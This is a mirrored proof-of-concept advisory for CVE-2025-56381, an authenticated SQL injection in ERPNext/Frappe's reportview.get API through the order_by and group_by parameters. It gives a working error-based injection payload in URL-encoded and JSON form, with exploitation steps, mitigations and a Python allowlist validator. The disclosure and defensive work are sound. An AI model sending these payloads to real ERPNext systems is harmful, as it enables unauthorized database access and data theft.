PoC details: 57275b719f4dfb7e950d525c95367d638f187531

Source
Related vulnerability
Title: ERPNEXT security vulnerability (CVE-2025-56381)
Description: ERPNext is an open-source enterprise resource planning solution from the Indian company ERPNext. ERPNEXT v15.67.0 contains a security vulnerability caused by the order_by and group_by parameters not being validated, which can lead to SQL injection attacks.
Description
ERPNEXT v15.67.0 was discovered to contain multiple SQL injection vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.
Introduction
# CVE-2025-56381 — Authenticated SQL Injection in ERPNext / Frappe via `order_by` and `group_by` Parameters

## 📌 Summary

ERPNext v15.67.0 and Frappe Framework v15.72.4 contain multiple **authenticated SQL injection vulnerabilities** in the `frappe.desk.reportview.get` API endpoint. Malicious input to the `order_by` or `group_by` parameters can be used to inject and execute arbitrary SQL statements. This allows an authenticated user (with basic access to reports) to extract sensitive data, perform database enumeration, and potentially manipulate or escalate privileges within the system.

---

## 🛠 Technical Details

* **Vulnerability Type:** SQL Injection (CWE-89)
* **Affected Product(s):** ERPNext / Frappe
* **Affected Versions:**

  * Frappe — **15.72.4**
  * ERPNext — **15.67.0**
* **Affected Endpoint:**

  ```
  POST /api/method/frappe.desk.reportview.get
  ```
* **Vulnerable Parameters:**

  * `order_by`
  * `group_by`
* **Authentication Required:** Yes (valid session via `sid` cookie)
* **Attack Type:** Remote
* **Severity:** High (SQL code execution, data exfiltration, potential privilege escalation)
* **Estimated CVSS v3.1 Score:** **8.6 (High)** — *estimate; final score should be assigned by official CVE authority.*
* **Status:** Not fixed (as of disclosure)
* **Discovered by:** Mohammed Aloli ([GitHub](https://github.com/MoAlali), [X](https://x.com/alaliksa_), [LinkedIn](https://www.linkedin.com/in/mohammedaloli/))
* **CVE ID:** **CVE-2025-56381**

---

## 🚀 Proof of Concept (PoC) — Error-based SQL Injection
<img width="1072" height="1376" alt="image" src="https://github.com/user-attachments/assets/ef4a77fa-a9f5-417f-baf0-5ebcef3523ce" />

> ✅ Test only on systems you **own** or have **explicit permission** to test. Do **not** use against production systems without consent.

### ❗ Payload (URL-encoded):

```text
%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29
```

### Example JSON Body (POST Request):

```json
{
  "doctype": "User",
  "order_by": "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
}
```

The database error returned for this request (shown in the screenshot above) contains the current database name, confirming that the injected expression was evaluated by the database server.

---

## 🧪 Exploitation Scenario

1. An attacker logs into an ERPNext/Frappe instance with basic permissions (e.g., access to standard reports).
2. A crafted POST request is sent to `/api/method/frappe.desk.reportview.get` with a malicious `order_by` or `group_by` payload.
3. The backend interpolates this value directly into the SQL query without validation or escaping.
4. The attacker sees a database error revealing injected output — confirming the injection.
5. The same technique could be chained with time-based payloads, UNION-based injection, or privilege escalation paths depending on the underlying database configuration.

---

## 🔐 Mitigation Recommendations

1. **Use Parameterized Queries:** All user input must be bound securely and **never** concatenated directly into SQL queries.
2. **Strict Input Validation:** Validate `order_by` and `group_by` against a known allowlist of acceptable column names before processing.
3. **Escape Identifiers Properly:** Use DBMS-specific escaping for column/field identifiers if dynamic usage is required.
4. **Minimize Exposure:** Restrict access to the `/reportview.get` API and report features based on user roles and trust levels.
5. **Sanitize Logs:** Avoid logging raw injection payloads to prevent leakage in audit systems.
6. **Rate Limit API Requests:** Throttle high-frequency API calls to reduce the impact of blind or error-based enumeration attempts.
7. **Apply Patches:** Frappe maintainers should release a patch securing this endpoint and audit other `frappe.desk` methods. Operators should upgrade as soon as a patch is available.
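As an added illustration of recommendations 2 and 3 (this is example code written for this page, not Frappe's or ERPNext's own implementation), the following Python shows one way to allowlist-validate `order_by` / `group_by` values before they reach an SQL string. The `DOCTYPE_FIELDS` table, the term grammar and the function names are assumptions made for the example; a real implementation would derive the allowed field set from the doctype's metadata. The key design point is that the returned clause is rebuilt from parsed pieces, so no byte of the caller's input is ever concatenated into the query.

```python
import re

# Constructed sample allowlist: the field names a doctype actually exposes.
# Hypothetical source for this example; a real deployment would build this
# from doctype metadata rather than a hard-coded dict.
DOCTYPE_FIELDS = {
    "User": {"name", "creation", "modified", "full_name", "enabled"},
}

# Grammar for a single term: optional `tabDoctype`. prefix, an (optionally
# backtick-quoted) identifier, optional ASC/DESC. Anything else, including
# parentheses, function calls, subqueries or comments, fails to match.
_TERM_RE = re.compile(
    r"^\s*(?:`tab(?P<dt>[A-Za-z0-9 _-]+)`\.)?"
    r"`?(?P<field>[A-Za-z0-9_]+)`?"
    r"(?:\s+(?P<direction>asc|desc))?\s*$",
    re.IGNORECASE,
)


class UnsafeClauseError(ValueError):
    """Raised when an order_by/group_by value fails the allowlist check."""


def validate_clause(doctype, clause, allow_direction=True):
    """Return a canonical, safe ORDER BY / GROUP BY clause or raise.

    allow_direction=False is used for GROUP BY, where ASC/DESC make no sense.
    """
    if doctype not in DOCTYPE_FIELDS:
        raise UnsafeClauseError(f"unknown doctype {doctype!r}")
    if not clause or not clause.strip():
        return ""
    allowed = DOCTYPE_FIELDS[doctype]
    safe_terms = []
    for raw_term in clause.split(","):
        match = _TERM_RE.match(raw_term)
        if match is None:
            # Structural rejection: the term is not "identifier [asc|desc]".
            raise UnsafeClauseError(f"rejected term {raw_term.strip()!r}")
        table = match.group("dt")
        if table is not None and table != doctype:
            raise UnsafeClauseError(f"cross-table reference to {table!r}")
        field = match.group("field")
        if field not in allowed:
            # Semantic rejection: syntactically fine, but not an exposed field.
            raise UnsafeClauseError(f"field {field!r} not in allowlist")
        direction = match.group("direction")
        if direction and not allow_direction:
            raise UnsafeClauseError("direction not permitted in GROUP BY")
        # Rebuild the term from validated parts; the raw input is discarded.
        term = f"`tab{doctype}`.`{field}`"
        if direction:
            term += " " + direction.upper()
        safe_terms.append(term)
    return ", ".join(safe_terms)


def is_safe_clause(doctype, clause, allow_direction=True):
    """Boolean wrapper, convenient for request-level validation hooks."""
    try:
        validate_clause(doctype, clause, allow_direction)
    except UnsafeClauseError:
        return False
    return True


if __name__ == "__main__":
    # The advisory's error-based payload does not match the grammar at all...
    payload = "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
    print(is_safe_clause("User", payload))  # False
    # ...while an ordinary sort expression is accepted and canonicalised.
    print(validate_clause("User", "`tabUser`.`creation` desc, name"))
```

Because the clause is reconstructed rather than passed through, a bypass would require a term that both matches the grammar and names an allowlisted field, which leaves no room for injected SQL. Note that this protects identifiers only; values used in `filters` and similar parameters still belong in bound query parameters.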

---

## 🔗 References

* Discoverer: [Mohammed Aloli](https://www.linkedin.com/in/mohammedaloli/)

  * GitHub: [MoAlali](https://github.com/MoAlali)
  * X (Twitter): [@alaliksa_](https://x.com/alaliksa_)
* Frappe Framework: [https://github.com/frappe/frappe](https://github.com/frappe/frappe)
* ERPNext Project: [https://github.com/frappe/erpnext](https://github.com/frappe/erpnext)
* OWASP SQL Injection Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)

## 📢 Disclaimer

This advisory is published for educational and defensive security research purposes only. Exploiting this vulnerability without authorization is illegal and unethical. If you're a developer or administrator of ERPNext or Frappe, apply the recommended mitigations immediately and monitor for unusual API usage.

---
File snapshot

```text
[4.0K] /data/pocs/57275b719f4dfb7e950d525c95367d638f187531
├── [1.2K] advisory.md
├── [1.5K] cve.json
└── [4.7K] README.md

0 directories, 3 files
```
Cached for you by 神龙机器人
Notes
    1. It is recommended to access the PoC through the original source first.
    2. If the source has become unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.